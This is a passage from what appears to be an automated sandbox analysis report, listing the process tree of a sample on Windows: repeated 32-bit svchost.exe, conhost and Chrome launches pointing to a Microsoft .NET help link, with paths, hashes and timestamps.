                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:22
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff6a5670000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:23
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:24
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:25
                                                                                Start time:05:34:08
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:26
                                                                                Start time:05:34:13
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:27
                                                                                Start time:05:34:14
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:29
                                                                                Start time:05:34:17
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:30
                                                                                Start time:05:34:17
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:31
                                                                                Start time:05:34:18
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:32
                                                                                Start time:05:34:18
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:33
                                                                                Start time:05:34:21
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:34
                                                                                Start time:05:34:23
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:35
                                                                                Start time:05:34:27
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:36
                                                                                Start time:05:34:27
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:37
                                                                                Start time:05:34:28
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:38
                                                                                Start time:05:34:28
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:40
                                                                                Start time:05:34:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff6068e0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:41
                                                                                Start time:05:34:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:42
                                                                                Start time:05:34:37
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:43
                                                                                Start time:05:34:37
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:44
                                                                                Start time:05:34:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:45
                                                                                Start time:05:34:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:46
                                                                                Start time:05:34:41
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:47
                                                                                Start time:05:34:41
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:48
                                                                                Start time:05:34:44
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:49
                                                                                Start time:05:34:44
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:50
                                                                                Start time:05:34:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:51
                                                                                Start time:05:34:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:52
                                                                                Start time:05:34:49
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:53
                                                                                Start time:05:34:50
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:54
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:55
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:56
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:57
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:58
                                                                                Start time:05:34:57
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:59
                                                                                Start time:05:34:58
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:60
                                                                                Start time:05:35:01
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:61
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:62
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:63
                                                                                Start time:05:35:02
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:64
                                                                                Start time:05:35:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

